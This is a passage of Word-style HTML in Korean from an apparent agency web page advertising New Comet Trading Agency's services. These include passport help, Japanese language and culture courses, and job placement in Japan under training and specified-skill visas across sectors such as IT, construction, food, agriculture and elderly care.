style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본으로 연수비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">도쿠테이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기노 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Tokutei Ginou) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자로 취업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">희망하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분들 위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">전통문화와</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">풍속을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">익히도록 필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">코스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육 시키고 취직을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> N3, N2(JLPT, JFT, NAT-Test, Top J)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격하는 분들이</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Work Visa </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인</span><o:p></o:p></li></ol><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">번역</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; • IT&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">엔지니어링</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Civil</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Mechanical</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">, EP, EC, Auto CAD&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">)</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">간호지원</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업으로 일본으로 가고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶다면</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해당</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">학당으로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp;New Comet Trading Agency</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다음</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업체를 훈련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Training Visa)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 가고 싶은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자매를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비 &nbsp; &nbsp; 스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">주선하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자동차</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수리</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">집</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">짓기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">식품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌀</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">매장</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운영</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">호텔</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비즈니스</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">의류</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">농업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">물</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">돌봄</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업</span><o:p></o:p></p><p><span 